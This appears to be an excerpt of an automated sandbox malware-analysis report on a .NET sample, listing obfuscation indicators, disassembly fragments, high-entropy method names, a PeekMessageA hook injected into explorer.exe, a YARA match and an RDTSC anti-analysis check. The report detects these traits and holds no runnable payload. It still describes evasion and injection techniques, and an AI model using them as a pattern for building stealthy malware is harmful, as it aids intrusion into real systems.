          Source: Binary string: wntdll.pdbUGP source: GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GCeHcfCef8.exe, GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: GCeHcfCef8.exe, FormDANHMUC.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.cs.Net Code: LGMLPCIxtm System.Reflection.Assembly.Load(byte[])
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.cs.Net Code: LGMLPCIxtm System.Reflection.Assembly.Load(byte[])
          Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, -Module-.cs.Net Code: _202E_202A_200D_200D_200E_202C_206D_202D_200C_200C_206E_206D_206E_202D_200E_206E_200F_200F_202E_202C_200E_206C_206F_202D_200F_200B_202A_202E_200D_206A_200E_202E_202C_200C_200E_200B_206B_202B_206A_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, bU.cs.Net Code: A8
          Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, bU.cs.Net Code: _202E_206F_202C_200E_200F_202C_202B_206A_202B_200D_200B_206B_202E_200E_202E_200B_206F_202A_206F_202B_206D_200C_202B_206F_202B_202B_202E_206A_206D_202C_206A_206A_206D_200B_202A_202A_200E_200F_200B_200C_202E System.AppDomain.Load(byte[])
          Source: 3.2.explorer.exe.1057f840.0.raw.unpack, FormDANHMUC.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 4.2.cmmon32.exe.48bf840.3.raw.unpack, FormDANHMUC.cs.Net Code: InitializeComponent contains xor as well as GetObject
          Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, Ft.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041A878 push eax; retf 2_2_0041A87D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041EA0F push ss; ret 2_2_0041EA11
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0040E473 pushfd ; iretd 2_2_0040E475
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00414D8C push ecx; retf 2_2_00414D8F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E09AD push ecx; mov dword ptr [esp], ecx2_2_016E09B6
          Source: C:\Windows\explorer.exeCode function: 3_2_102D09B5 push esp; retn 0000h3_2_102D0AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_102D0B02 push esp; retn 0000h3_2_102D0B03
          Source: C:\Windows\explorer.exeCode function: 3_2_102D0B1E push esp; retn 0000h3_2_102D0B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10E2C9B5 push esp; retn 0000h3_2_10E2CAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10E2CB02 push esp; retn 0000h3_2_10E2CB03
          Source: C:\Windows\explorer.exeCode function: 3_2_10E2CB1E push esp; retn 0000h3_2_10E2CB1F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043727FA pushad ; ret 4_2_043727F9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0437225F pushad ; ret 4_2_043727F9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0437283D push eax; iretd 4_2_04372858
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043A09AD push ecx; mov dword ptr [esp], ecx4_2_043A09B6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041E0F6 push ss; ret 4_2_0041E0F7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0040E473 pushfd ; iretd 4_2_0040E475
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041A878 push eax; retf 4_2_0041A87D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041EA0F push ss; ret 4_2_0041EA11
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00414D8C push ecx; retf 4_2_00414D8F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041D4B5 push eax; ret 4_2_0041D508
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041D56C push eax; ret 4_2_0041D572
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041D502 push eax; ret 4_2_0041D508
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041D50B push eax; ret 4_2_0041D572
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0041DFE1 push eax; iretd 4_2_0041DFE2
          Source: GCeHcfCef8.exeStatic PE information: 0xC947732C [Sun Jan 3 12:35:56 2077 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.772448962895667
          Source: 0.2.GCeHcfCef8.exe.31bdef0.0.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, CryDA69PZS9roASDxk.csHigh entropy of concatenated method names: 'NHM8iwgadK', 'iN68X2Ooyu', 'VsQ8fqxquV', 'a6cfHr3Mk6', 'cUsfz8l3Xw', 'Ktw814cF7y', 'q488ZpAI5R', 'wxv8Oo9fl7', 'Dg68hHaB7P', 'mEc8LrEWvN'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mYNhTexpbTsIsSe0PY.csHigh entropy of concatenated method names: 'uRAhqfK3ay', 'xOfhifsKaa', 'rORh2LBbA7', 'zqbhXoqC6g', 'OE9hFvSslg', 'rb5hfisouD', 'dqth8kZdks', 'ULKhxNAL73', 'hS7hUA8sE7', 'fFUhTbxD5i'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, EIFMoAl4oDSnMK7fyt.csHigh entropy of concatenated method names: 'OuVXEQhCAo', 'SdjXoWyq5p', 'IaFXAWxQF1', 'Hg1XlHRD3x', 'rcdXpy7ByR', 'djIXeHpGA6', 'mFXXuojdBh', 'wIIXVHe6bT', 'ILPXSicrIB', 'bw6XNY7Vw0'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, g7LrKAAAjpDeQiBfvZ.csHigh entropy of concatenated method names: 'H6u2Ji7iUm', 'mS22y603NE', 'nIi2406uRo', 'ku82j2MIeJ', 'pXI2s5QpBn', 'XCo2DqqfQT', 'Lke2v5VGkg', 'FYN2rBHBUn', 'Xum2nEu63y', 'a7n2HX4hB8'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, X012gv2u2cUD49Zhbt.csHigh entropy of concatenated method names: 'Dispose', 'b2RZneInxP', 'XKgOM393dy', 'hN3CCjBg6H', 'zIXZHMpY1y', 'TfWZzei7Si', 'ProcessDialogKey', 'XByO1Oa20s', 'MMcOZX1rAF', 'a2JOOv6OgD'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, SOa20snIMcX1rAF12J.csHigh entropy of concatenated method names: 'Q1EV0Hyqwr', 'wuYVMYMlkI', 'epSV52CCmS', 'YiaVYlC5pp', 'FWUVJN3UQq', 'F0QVkH1QMu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, o3CIWiJtO7McCaovZf.csHigh entropy of concatenated method names: 'isRpKPVM9s', 'DM4pt1lhi2', 'TrOpJ4ORW5', 'IHPpy467ZJ', 'wxxpMbJmKw', 'dhLp5vSDwg', 'm7SpYk0XAX', 'sHGpkB7AUn', 'yU3p6W2655', 'nYVp9a8akb'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, xDRJ5TZ1v3AtSbQZx4g.csHigh entropy of concatenated method names: 'abNSRYWEsj', 'ugVSbJhkte', 'ei6SPvYTSn', 'q1FSEiTxQ2', 'YFASm0CEk6', 'SrhSov3Kr1', 'JqWSghWEZE', 'jqBSAZxevP', 'JfPSl3KmZA', 'pLtSdOUl8T'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, m2i897LlKZlipw7E2m.csHigh entropy of concatenated method names: 'lG2Z87LrKA', 'DjpZxDeQiB', 'E4oZTDSnMK', 'wfyZ3tbLIl', 'sLdZpyOj83', 'F8HZeWiWGA', 'XpCC6d4dDpqpiVIFm6', 'zRshXF0snAgGCmhLya', 'saAZZ6LDHB', 'AjDZhdHJU1'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, yOsJQocmXUmHPXUuc0.csHigh entropy of concatenated method names: 'GDowA1wjeo', 'JBPwlDpE9o', 'mWew0GNXuR', 'J26wMDqlJa', 'snLwYoOqrc', 'k96wk5AMNv', 'i4Iw9iWTQ3', 'LdcwIQhTqb', 'n9pwKqnmSb', 'XEfwBl8E9v'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, IGU6EgOvFdlUefuYca.csHigh entropy of concatenated method names: 'f1OPEsWJT', 'KiHESh9m7', 'TZXoVbnr2', 'CFNgwd2qc', 'eStlm1qOJ', 'APQd90BEj', 'JnQ9wufQtJyZwII272', 'wG6rTwDugooMg0ui7s', 'YWbV0uLHM', 'ORVNLaPlf'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, veinETXm5LENmkkHuT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TUaOnfuMfF', 'p8FOH5w8AT', 'hBwOz6WbIT', 'SVah1NX5Co', 'g87hZV46OJ', 'J0GhOF0HBU', 'IPihhY1Hcj', 'aIkIMG7b3LH22dqiNOt'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, T83d8H0WiWGA1rlfc0.csHigh entropy of concatenated method names: 'pybfqBGSEf', 'W09f2qU0xc', 'jWqfFm3r7i', 'ww3f8o5QU3', 'UeYfxWhw42', 't8JFsesAYh', 'qKlFDJKoZ2', 'Qf9FvYO7gY', 'LAbFrWR6r2', 'TpOFnxKIPe'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, yLIl4FdYPqOOHNLdyO.csHigh entropy of concatenated method names: 'S8kFmBqM2K', 'LuOFgxQH69', 'w1OX5CfGRZ', 'SqvXYwJwNU', 'aqZXkQlDxw', 'XFbX6lwAG5', 'z07X9mrG4E', 'sTdXISQKRr', 'eDEXWx6ACi', 'smQXK53JHw'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, W6OgDvHbMVckFRWZ4G.csHigh entropy of concatenated method names: 'Hc6SZTtkaM', 'ADFShtdmtC', 'oT6SLL6st2', 'qJfSixExCk', 'F84S24RAmH', 'Ok6SFYJmee', 'nSrSfMx8cd', 'OFFVvp00ls', 'WnKVrV90FV', 'J9nVn9Wsxf'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, mFNQE5DNyZSd6yBQ8w.csHigh entropy of concatenated method names: 'Xpduryv00C', 'O1GuHW5yZt', 'rd9V1rN353', 'zkiVZE9HmR', 'xYmuB0vSAr', 'hZ4utIJTav', 'S4ducWOsva', 'WaAuJyggSb', 'hKDuyQJgG9', 'fSmu4edPjU'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, meWMvOklrX16XSKSCA.csHigh entropy of concatenated method names: 'kZJf93j2iC', 'VA3fWU07W5', 'Or3f6XIRlG', 'SsGwoDqcpttRmUfMpU3', 'MbO9IsqFA1cFyyc99gE', 'DQnbXnqpCyBo8QeYmA2', 'iGEiDwqW1elbxverk8C'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, IEcJZcWOuQfor04MP1.csHigh entropy of concatenated method names: 'hG08Rn6Am5', 'XOI8bdmLBv', 'dRJ8PLLugS', 'TEX8EWKBLg', 'wph8mdQnMe', 'DGh8oHIYPT', 'mG88gglb3u', 'xgy8AfVlBA', 'NEQ8lDA9oD', 'sZb8drBbPH'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, MXMpY1ry4fWei7SirB.csHigh entropy of concatenated method names: 'IYDVioAmZ7', 'VgSV26QkgT', 'uAAVXaifxt', 'SrMVF2Gd6Q', 'uPyVfgfwbk', 'oMYV8SpHea', 'gTYVx321UA', 'vj9VUlQICY', 'DBcVTf5DDu', 'FvnV3gPCgP'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, bQqwvGzK37upD0s45s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'beISwFV460', 'nvFSpWCjEO', 'JkLSeqtgcr', 'FhxSu8Xk88', 'dQbSV99ldU', 'oDsSSdRO6x', 'aNRSNo7LsQ'
          Source: 0.2.GCeHcfCef8.exe.4d54c30.2.raw.unpack, WBaWSpZZfYeiOcV9gpa.csHigh entropy of concatenated method names: 'ToString', 'EshNhXhxX5', 'nWONL6mmX5', 'C5QNqQgwO0', 'awfNiFxdF4', 'l4WN2KUDUe', 'oJdNXlAk5X', 'ik2NFkeCuX', 'Vk9n4sBn1ZDe2IixyHH', 'Wnak0GBKQ3Yi8cV1Bbr'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, CryDA69PZS9roASDxk.csHigh entropy of concatenated method names: 'NHM8iwgadK', 'iN68X2Ooyu', 'VsQ8fqxquV', 'a6cfHr3Mk6', 'cUsfz8l3Xw', 'Ktw814cF7y', 'q488ZpAI5R', 'wxv8Oo9fl7', 'Dg68hHaB7P', 'mEc8LrEWvN'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mYNhTexpbTsIsSe0PY.csHigh entropy of concatenated method names: 'uRAhqfK3ay', 'xOfhifsKaa', 'rORh2LBbA7', 'zqbhXoqC6g', 'OE9hFvSslg', 'rb5hfisouD', 'dqth8kZdks', 'ULKhxNAL73', 'hS7hUA8sE7', 'fFUhTbxD5i'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, EIFMoAl4oDSnMK7fyt.csHigh entropy of concatenated method names: 'OuVXEQhCAo', 'SdjXoWyq5p', 'IaFXAWxQF1', 'Hg1XlHRD3x', 'rcdXpy7ByR', 'djIXeHpGA6', 'mFXXuojdBh', 'wIIXVHe6bT', 'ILPXSicrIB', 'bw6XNY7Vw0'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, g7LrKAAAjpDeQiBfvZ.csHigh entropy of concatenated method names: 'H6u2Ji7iUm', 'mS22y603NE', 'nIi2406uRo', 'ku82j2MIeJ', 'pXI2s5QpBn', 'XCo2DqqfQT', 'Lke2v5VGkg', 'FYN2rBHBUn', 'Xum2nEu63y', 'a7n2HX4hB8'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, X012gv2u2cUD49Zhbt.csHigh entropy of concatenated method names: 'Dispose', 'b2RZneInxP', 'XKgOM393dy', 'hN3CCjBg6H', 'zIXZHMpY1y', 'TfWZzei7Si', 'ProcessDialogKey', 'XByO1Oa20s', 'MMcOZX1rAF', 'a2JOOv6OgD'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, SOa20snIMcX1rAF12J.csHigh entropy of concatenated method names: 'Q1EV0Hyqwr', 'wuYVMYMlkI', 'epSV52CCmS', 'YiaVYlC5pp', 'FWUVJN3UQq', 'F0QVkH1QMu', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, o3CIWiJtO7McCaovZf.csHigh entropy of concatenated method names: 'isRpKPVM9s', 'DM4pt1lhi2', 'TrOpJ4ORW5', 'IHPpy467ZJ', 'wxxpMbJmKw', 'dhLp5vSDwg', 'm7SpYk0XAX', 'sHGpkB7AUn', 'yU3p6W2655', 'nYVp9a8akb'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, xDRJ5TZ1v3AtSbQZx4g.csHigh entropy of concatenated method names: 'abNSRYWEsj', 'ugVSbJhkte', 'ei6SPvYTSn', 'q1FSEiTxQ2', 'YFASm0CEk6', 'SrhSov3Kr1', 'JqWSghWEZE', 'jqBSAZxevP', 'JfPSl3KmZA', 'pLtSdOUl8T'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, m2i897LlKZlipw7E2m.csHigh entropy of concatenated method names: 'lG2Z87LrKA', 'DjpZxDeQiB', 'E4oZTDSnMK', 'wfyZ3tbLIl', 'sLdZpyOj83', 'F8HZeWiWGA', 'XpCC6d4dDpqpiVIFm6', 'zRshXF0snAgGCmhLya', 'saAZZ6LDHB', 'AjDZhdHJU1'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, yOsJQocmXUmHPXUuc0.csHigh entropy of concatenated method names: 'GDowA1wjeo', 'JBPwlDpE9o', 'mWew0GNXuR', 'J26wMDqlJa', 'snLwYoOqrc', 'k96wk5AMNv', 'i4Iw9iWTQ3', 'LdcwIQhTqb', 'n9pwKqnmSb', 'XEfwBl8E9v'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, IGU6EgOvFdlUefuYca.csHigh entropy of concatenated method names: 'f1OPEsWJT', 'KiHESh9m7', 'TZXoVbnr2', 'CFNgwd2qc', 'eStlm1qOJ', 'APQd90BEj', 'JnQ9wufQtJyZwII272', 'wG6rTwDugooMg0ui7s', 'YWbV0uLHM', 'ORVNLaPlf'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, veinETXm5LENmkkHuT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TUaOnfuMfF', 'p8FOH5w8AT', 'hBwOz6WbIT', 'SVah1NX5Co', 'g87hZV46OJ', 'J0GhOF0HBU', 'IPihhY1Hcj', 'aIkIMG7b3LH22dqiNOt'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, T83d8H0WiWGA1rlfc0.csHigh entropy of concatenated method names: 'pybfqBGSEf', 'W09f2qU0xc', 'jWqfFm3r7i', 'ww3f8o5QU3', 'UeYfxWhw42', 't8JFsesAYh', 'qKlFDJKoZ2', 'Qf9FvYO7gY', 'LAbFrWR6r2', 'TpOFnxKIPe'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, yLIl4FdYPqOOHNLdyO.csHigh entropy of concatenated method names: 'S8kFmBqM2K', 'LuOFgxQH69', 'w1OX5CfGRZ', 'SqvXYwJwNU', 'aqZXkQlDxw', 'XFbX6lwAG5', 'z07X9mrG4E', 'sTdXISQKRr', 'eDEXWx6ACi', 'smQXK53JHw'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, W6OgDvHbMVckFRWZ4G.csHigh entropy of concatenated method names: 'Hc6SZTtkaM', 'ADFShtdmtC', 'oT6SLL6st2', 'qJfSixExCk', 'F84S24RAmH', 'Ok6SFYJmee', 'nSrSfMx8cd', 'OFFVvp00ls', 'WnKVrV90FV', 'J9nVn9Wsxf'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, mFNQE5DNyZSd6yBQ8w.csHigh entropy of concatenated method names: 'Xpduryv00C', 'O1GuHW5yZt', 'rd9V1rN353', 'zkiVZE9HmR', 'xYmuB0vSAr', 'hZ4utIJTav', 'S4ducWOsva', 'WaAuJyggSb', 'hKDuyQJgG9', 'fSmu4edPjU'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, meWMvOklrX16XSKSCA.csHigh entropy of concatenated method names: 'kZJf93j2iC', 'VA3fWU07W5', 'Or3f6XIRlG', 'SsGwoDqcpttRmUfMpU3', 'MbO9IsqFA1cFyyc99gE', 'DQnbXnqpCyBo8QeYmA2', 'iGEiDwqW1elbxverk8C'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, IEcJZcWOuQfor04MP1.csHigh entropy of concatenated method names: 'hG08Rn6Am5', 'XOI8bdmLBv', 'dRJ8PLLugS', 'TEX8EWKBLg', 'wph8mdQnMe', 'DGh8oHIYPT', 'mG88gglb3u', 'xgy8AfVlBA', 'NEQ8lDA9oD', 'sZb8drBbPH'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, MXMpY1ry4fWei7SirB.csHigh entropy of concatenated method names: 'IYDVioAmZ7', 'VgSV26QkgT', 'uAAVXaifxt', 'SrMVF2Gd6Q', 'uPyVfgfwbk', 'oMYV8SpHea', 'gTYVx321UA', 'vj9VUlQICY', 'DBcVTf5DDu', 'FvnV3gPCgP'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, bQqwvGzK37upD0s45s.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'beISwFV460', 'nvFSpWCjEO', 'JkLSeqtgcr', 'FhxSu8Xk88', 'dQbSV99ldU', 'oDsSSdRO6x', 'aNRSNo7LsQ'
          Source: 0.2.GCeHcfCef8.exe.c450000.7.raw.unpack, WBaWSpZZfYeiOcV9gpa.csHigh entropy of concatenated method names: 'ToString', 'EshNhXhxX5', 'nWONL6mmX5', 'C5QNqQgwO0', 'awfNiFxdF4', 'l4WN2KUDUe', 'oJdNXlAk5X', 'ik2NFkeCuX', 'Vk9n4sBn1ZDe2IixyHH', 'Wnak0GBKQ3Yi8cV1Bbr'
          Source: 0.2.GCeHcfCef8.exe.5ce0000.6.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
          Source: 0.2.GCeHcfCef8.exe.31cdf08.1.raw.unpack, Ft.csHigh entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: Process Memory Space: GCeHcfCef8.exe PID: 6280, type: MEMORYSTR
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
